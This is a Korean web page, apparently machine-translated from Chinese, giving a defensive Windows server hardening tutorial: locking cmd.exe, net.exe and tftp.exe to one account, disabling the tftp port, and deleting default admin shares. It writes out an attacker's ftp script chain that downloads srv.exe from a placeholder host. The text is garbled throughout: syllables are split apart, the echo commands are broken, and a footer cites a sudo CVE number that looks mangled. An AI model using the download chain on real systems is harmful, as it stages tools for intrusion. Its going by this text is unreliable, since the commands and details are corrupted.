안전 고수:넘 치 는 공격 을 멀리 합 니 다.
우리 가 해 야 할 일 은 모든 사용 자 를 삭제 한 다음 에 CmdUser 라 는 사용 자 를 추가 하 는 것 입 니 다.완 성 된 후에 확인 하면 됩 니 다.하지만 이렇게 하면 된다 고 생각 하지 마 세 요.그리고 net.exe 를 찾 아야 합 니 다.이것 도 cmd.exe 방법 에 따라 설정 합 니 다.여러분 이 net.exe 를 찾 았 을 때 옆 에 net1.exe 가 있 는 것 을 발 견 했 습 니 다.이것 도 설정 해 야 합 니 다.설정 되 어 있 습 니 다.한숨 돌 렸 다 고 생각 하지 마 세 요.사실은 이렇게 하면 초보 해커 들 을 상대 할 수 있 지만 상대방 이 늙 은 새 라면 tftp 를 통 해또는 ftp 등 으로 로 컬 넘 치 는 넘 치 는 프로그램 을 전송 합 니 다.우 리 는 game over 입 니 다.또는 그 가 목 마 를 올 리 거나 서 비 스 를 교체 하 는 방법 을 이용 하 는 것 도 막 을 수 없습니다.아마도 독자 들 이 물 어 볼 것 입 니 다.당신 이 제기 한 이상 해결 방법 이 있 는 것 이 아 닙 니까?좋 습 니 다!약간의 방법 이 라 고 할 수 있 습 니 다.다음은 tftp 의 방법 을 말씀 드 리 겠 습 니 다.이것 은 아주 간단 합 니 다.C:\WINNT\system 32\drivers\etc 에 들 어가 서 수첩 으로 services 라 는 파일 을 엽 니 다.그림 2 참조
tftp 라 는 포트 를 0 으로 수정 합 니 다.이렇게 하면 침입 하면 tftp CI Host get files.exe 파일 을 사용 하여 자신의 도 구 를 전송 하지 않 습 니 다.물론,더 좋 은 안전성 을 위해 서,우 리 는 tftp.exe 라 는 파일 을 검색 한 후에 tftp 라 는 실행 파일 을 cmd 에 따라 실행 할 수 있 습 니 다.exe 처럼 cmduser 라 는 사용자 만 사용 할 수 있 도록 추가 합 니 다.다음은 또 다른 방법 을 말씀 드 리 겠 습 니 다.ftp 를 이용 해 물건 을 다운로드 하 라 는 명령 을 기억 하 실 거 라 고 믿 습 니 다.뭐라고 요?너 몰라?제 가 말씀 드 리 겠 습 니 다:echo open xxx.xxx.xxx>ftp.txt echo user>ftp.txt echo password>ftp.txt echo get srv.exe>ftp.txt echo by>ftp.txt ftp-s:ftp.txt del ftp.txt 이렇게 하면 srv.exe 라 는 소프트웨어 를 다운로드 할 수 있 습 니 다.cmd 방법 에 따라 ftp 의 사용 권한 을 cmduser 에 배분 할 수 있 습 니 다.이렇게 하면 상대방 에 게 소프트웨어 를 올 리 는 것 을 피 할 수 있 습 니 다.사실은 올 릴 수 있 는 방법 이 많 지만 저 는 독자 에 게 생각 을 남 겼 습 니 다.그래 야 우 리 는 자신의 기술 을 향상 시 킬 수 있 기 때 문 입 니 다.또한,일부 친구 들 은 다음 스 크 립 트 를 이용 하여 ipc$기본 공 유 를 닫 을 수 있 습 니 다.@echo off net share c$/del net share d$/del net share e e$/del net share f$/del net share ipc$/del net share admin$/del@cls 하지만 우리 가 이렇게 설정 하면 귀 찮 을 수 있 습 니 다.그래서 우 리 는 맨 뒤에 net start explorer 를 추가 해서 켜 기 스 크 립 트 를 만 드 는 것 이 좋 을 것 같 습 니 다.왜 가능 하 다 고 말 합 니까?나 는 시간 관계 때문에 미 처 실험 하지 못 했 습 니 다.실험 에 성공 한 친구 가 포럼 에 가서 당신 의 견 해 를 발표 하 기 를 바 랍 니 다!다음 에 기회 가 된다 면 sql injection 을 어떻게 방지 하 는 지 말씀 드 리 겠 습 니 다.시험 과정 에서 궁금 한 점 이 있다 면 이메일 to 를 환영 합 니 다[email protected]
                이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
Linux sudo 권한 향상 빈틈 CVE - 2021 - 31561 월 26 일 에 Sudo 는 유 닉 스 와 유사 한 운영 체제 가 명령 매개 변수 에서 역 슬 래 쉬 를 피 할 때 쌓 인 버퍼 에 구멍 이 나 지 않도록 안전 통 지 를 발표 했다.빈틈 등급: 고위 험, 빈틈 ...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.